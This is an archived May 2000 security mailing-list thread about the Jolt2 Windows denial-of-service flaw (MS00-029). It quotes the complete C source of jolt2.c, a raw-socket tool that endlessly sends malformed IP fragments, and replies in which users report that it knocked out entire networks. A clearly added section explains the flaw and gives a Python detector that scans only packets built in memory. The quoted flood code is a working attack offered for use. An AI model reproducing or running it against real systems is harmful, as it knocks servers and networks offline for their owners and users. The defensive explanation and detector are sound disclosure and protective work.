Subject: Re: Windows DoS code (jolt2.c)
From: Craig Williams (craig.williamsHOOKRISE.COM)
Date: Fri May 26 2000 - 09:10:49 CDT


I had the same result; in testing, our internal 10 meg LAN took
a beating while the code was running.

This can do serious damage to NT Web Servers!

Does this code only attack one port? It appears to allow a port
to be specified.

What is the concept behind this exploit?

Craig

> -----Original Message-----
> From: SMILER [mailto:smilerVXD.ORG]
> Sent: 26 May 2000 14:12
> To: win2ksecadviceLISTSERV.NTSECURITY.NET
> Subject: Re: Windows DoS code (jolt2.c)
>
>
> This code does more than taking a windoze box to its knees!! Well, I am in a
> network where we've got a 128k link and I used my shell account in the ISP
> with a really fast link to jolt one of the machines in my network. As soon
> as I pressed ENTER I lost connectivity in the whole network... I couldn't
> even try to stop the jolt... fortunately I had a backup ISDN connection that
> I used to stop the process!! Amazing flood!!!
> My point is... how could I protect my network from being flooded by someone
> using such a powerful tool?? Even if I use a packet filter at the entry point
> of my network I get flooded because my router will get 100% inbound traffic!!
> The only way that I can think of is asking my provider to re-route the
> traffic from the jolt source to a "dead-end" somehow! Any suggestions?
>
> smilervxd.org
>
> ----- Original Message -----
> From: Steve <steveSECURESOLUTIONS.ORG>
> To: <win2ksecadviceLISTSERV.NTSECURITY.NET>
> Sent: Thursday, May 25, 2000 9:48 PM
> Subject: Windows DoS code (jolt2.c)
>
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Here is some proof of concept code for the Jolt2 DoS reported by
> > BindView Razor Team (http://razor.bindview.com). Note, this code was
> > not created by me, I am simply passing it on to the mailing list.
> > Send all questions/problems to the author of the code,
> > phonixmoocow.org
> >
> > Regards;
> >
> > Steve Manzuik
> > Moderator
> >
> > - --------------snip----------------
> >
> >
> >
> > /*
> > * File: jolt2.c
> > * Author: Phonix <phonixmoocow.org>
> > * Date: 23-May-00
> > *
> > * Description: This is the proof-of-concept code for the
> > * Windows denial-of-service attack described by
> > * the Razor team (NTBugtraq, 19-May-00)
> > * (MS00-029). This code causes cpu utilization
> > * to go to 100%.
> > *
> > * Tested against: Win98; NT4/SP5,6; Win2K
> > *
> > * Written for: My Linux box. YMMV. Deal with it.
> > *
> > * Thanks: This is standard code. Ripped from lots of places.
> > * Insert your name here if you think you wrote some of
> > * it. It's a trivial exploit, so I won't take credit
> > * for anything except putting this file together.
> > */
> >
> > #include <stdio.h>
> > #include <string.h>
> > #include <netdb.h>
> > #include <sys/socket.h>
> > #include <sys/types.h>
> > #include <netinet/in.h>
> > #include <netinet/ip.h>
> > #include <netinet/ip_icmp.h>
> > #include <netinet/udp.h>
> > #include <arpa/inet.h>
> > #include <getopt.h>
> >
> > struct _pkt
> > {
> > struct iphdr ip;
> > union {
> > struct icmphdr icmp;
> > struct udphdr udp;
> > } proto;
> > char data;
> > } pkt;
> >
> > int icmplen = sizeof(struct icmphdr),
> > udplen = sizeof(struct udphdr),
> > iplen = sizeof(struct iphdr),
> > spf_sck;
> >
> > void usage(char *pname)
> > {
> > fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
> > pname);
> > fprintf (stderr, "Note: UDP used if a port is specified, otherwise
> > ICMP\n");
> > exit(0);
> > }
> >
> > u_long host_to_ip(char *host_name)
> > {
> > static u_long ip_bytes;
> > struct hostent *res;
> >
> > res = gethostbyname(host_name);
> > if (res == NULL)
> > return (0);
> > memcpy(&ip_bytes, res->h_addr, res->h_length);
> > return (ip_bytes);
> > }
> >
> > void quit(char *reason)
> > {
> > perror(reason);
> > close(spf_sck);
> > exit(-1);
> > }
> >
> > int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
> > {
> > int bs, psize;
> > unsigned long x;
> > struct sockaddr_in to;
> >
> > to.sin_family = AF_INET;
> > to.sin_port = 1235;
> > to.sin_addr.s_addr = dst_addr;
> >
> > if (port)
> > psize = iplen + udplen + 1;
> > else
> > psize = iplen + icmplen + 1;
> > memset(&pkt, 0, psize);
> >
> > pkt.ip.version = 4;
> > pkt.ip.ihl = 5;
> > pkt.ip.tot_len = htons(iplen + icmplen) + 40;
> > pkt.ip.id = htons(0x455);
> > pkt.ip.ttl = 255;
> > pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
> > pkt.ip.saddr = src_addr;
> > pkt.ip.daddr = dst_addr;
> > pkt.ip.frag_off = htons (8190);
> >
> > if (port)
> > {
> > pkt.proto.udp.source = htons(port|1235);
> > pkt.proto.udp.dest = htons(port);
> > pkt.proto.udp.len = htons(9);
> > pkt.data = 'a';
> > } else {
> > pkt.proto.icmp.type = ICMP_ECHO;
> > pkt.proto.icmp.code = 0;
> > pkt.proto.icmp.checksum = 0;
> > }
> >
> > while (1) {
> > bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
> > sizeof(struct sockaddr));
> > }
> > return bs;
> > }
> >
> > int main(int argc, char *argv[])
> > {
> > u_long src_addr, dst_addr;
> > int i, bs=1, port=0;
> > char hostname[32];
> >
> > if (argc < 2)
> > usage (argv[0]);
> >
> > gethostname (hostname, 32);
> > src_addr = host_to_ip(hostname);
> >
> > while ((i = getopt (argc, argv, "s:p:h")) != EOF)
> > {
> > switch (i)
> > {
> > case 's':
> > dst_addr = host_to_ip(optarg);
> > if (!dst_addr)
> > quit("Bad source address given.");
> > break;
> >
> > case 'p':
> > port = atoi(optarg);
> > if ((port <=0) || (port > 65535))
> > quit ("Invalid port number given.");
> > break;
> >
> > case 'h':
> > default:
> > usage (argv[0]);
> > }
> > }
> >
> > dst_addr = host_to_ip(argv[argc-1]);
> > if (!dst_addr)
> > quit("Bad destination address given.");
> >
> > spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
> > if (!spf_sck)
> > quit("socket()");
> > if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
> > sizeof(bs)) < 0)
> > quit("IP_HDRINCL");
> >
> > do_frags (spf_sck, src_addr, dst_addr, port);
> > }
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
> >
> > iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek
> > IAkI+Hv0ul66TxRmIJP1LqRH
> > =sSSM
> > -----END PGP SIGNATURE-----
>
> _____________________________________________________________________
> ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
> ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
> SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
>

_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
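Two questions in this thread, Craig's "what is the concept behind this exploit?" and SMILER's "how could I protect my network?", share one answer from the defender's side. The quoted code loops sending a single IP fragment whose offset field is 8190 (65520 bytes into the datagram) and whose total-length field cannot match the 29 bytes actually put on the wire, with the IP id fixed at 0x455. A stack without the MS00-029 fix keeps trying to reassemble a datagram that can never complete, which is where the 100% CPU comes from. Nothing on the receiving side can stop a saturated 128k link, but a host- or edge-side check that flags impossible fragments and counts how often the same one arrives gives you the source address and fragment id to hand to your provider. The following is an added example written for this page; it is not from the thread and not from jolt2.c. It parses raw IPv4 headers and applies three checks: total-length field versus bytes received, fragment end beyond 65535, and the same fragment repeating from one source. The packets it scans are constructed in memory (the `build_ipv4` fixture helper, hypothetical host addresses, and the 50-repeat threshold are all assumptions made here); nothing is sent.

```python
"""Added example (not from the thread or from jolt2.c): flag IPv4 fragments
that can never reassemble, and count a fragment repeated from one source."""
import struct
from collections import Counter

IP_MAX_DATAGRAM = 65535   # largest IPv4 datagram; no fragment may end past this


def build_ipv4(src, dst, proto, ident, mf, frag_off_bytes, payload, claimed_len=None):
    """Test-fixture builder (constructed here): pack a 20-byte IPv4 header in front
    of payload. Checksum left zero; the bytes only feed the parser in memory."""
    assert frag_off_bytes % 8 == 0
    flags_off = (0x2000 if mf else 0) | (frag_off_bytes // 8)
    tot_len = 20 + len(payload) if claimed_len is None else claimed_len
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, tot_len, ident, flags_off, 64, proto, 0,
                      bytes(int(o) for o in src.split(".")),
                      bytes(int(o) for o in dst.split(".")))
    return hdr + payload


def parse_ipv4(raw):
    """Decode the fixed IPv4 header (network byte order) into a dict."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, tot_len, ident, flags_off,
     ttl, proto, _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20:
        raise ValueError("not an IPv4 header")
    return {
        "ihl": ihl,
        "claimed_len": tot_len,                # what the header says arrived
        "wire_len": len(raw),                  # what actually arrived
        "id": ident,
        "mf": bool(flags_off & 0x2000),        # More Fragments flag
        "frag_off": (flags_off & 0x1FFF) * 8,  # 13-bit offset in 8-byte units
        "ttl": ttl,
        "proto": proto,
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
    }


def fragment_anomalies(pkt):
    """Return the reasons a single fragment can never be reassembled (empty if sane)."""
    reasons = []
    if pkt["claimed_len"] != pkt["wire_len"]:
        reasons.append("total length field %d != %d bytes on the wire"
                       % (pkt["claimed_len"], pkt["wire_len"]))
    if pkt["mf"] or pkt["frag_off"]:
        data_len = pkt["claimed_len"] - pkt["ihl"]
        end = pkt["frag_off"] + data_len
        if end > IP_MAX_DATAGRAM:
            reasons.append("fragment would end at byte %d, past %d" % (end, IP_MAX_DATAGRAM))
        if pkt["mf"] and data_len % 8:
            reasons.append("non-final fragment data not a multiple of 8 bytes")
    return reasons


def scan(packets, repeat_threshold=50):
    """Per-packet checks plus a repeat counter keyed on (src, dst, id, offset).
    Returns (src, dst, reason) tuples; src and id are what you hand upstream."""
    alerts = []
    seen = Counter()
    for raw in packets:
        pkt = parse_ipv4(raw)
        for reason in fragment_anomalies(pkt):
            alerts.append((pkt["src"], pkt["dst"], reason))
        if pkt["mf"] or pkt["frag_off"]:
            key = (pkt["src"], pkt["dst"], pkt["id"], pkt["frag_off"])
            seen[key] += 1
            if seen[key] == repeat_threshold:
                alerts.append((pkt["src"], pkt["dst"],
                               "fragment id=%#x offset=%d seen %d times"
                               % (pkt["id"], pkt["frag_off"], repeat_threshold)))
    return alerts


# Constructed traffic. NORMAL is a two-piece datagram that reassembles fine.
NORMAL = [
    build_ipv4("10.0.0.5", "10.0.0.1", 17, 0x0001, True, 0, b"\x00" * 16),
    build_ipv4("10.0.0.5", "10.0.0.1", 17, 0x0001, False, 16, b"\x00" * 5),
]
# ONE_JOLT mirrors the header values in the quoted code: offset field 8190
# (65520 bytes), IP id 0x455, no MF bit, 29 bytes on the wire, but a total
# length field that disagrees with the wire length (68 is a constructed value).
ONE_JOLT = build_ipv4("192.0.2.10", "10.0.0.1", 1, 0x455, False, 65520,
                      b"\x08\x00" + b"\x00" * 6 + b"a", claimed_len=68)
FLOOD = [ONE_JOLT] * 60


def demo():
    """Return alert counts for the sane stream and the constructed flood."""
    return len(scan(NORMAL)), len(scan(FLOOD))


if __name__ == "__main__":
    alerts = scan(FLOOD)
    for a in alerts[:2] + alerts[-1:]:
        print(a)
```

The sane two-fragment datagram produces no alerts; every copy of the constructed fragment trips both the length-mismatch and the past-65535 checks, and the fiftieth copy adds the repeat alert carrying the source and IP id. On a real interface you would feed `scan` the raw IPv4 frames from a capture library rather than the constructed list, and rate-limit the per-packet alerts so the detector itself is not the next thing that falls over.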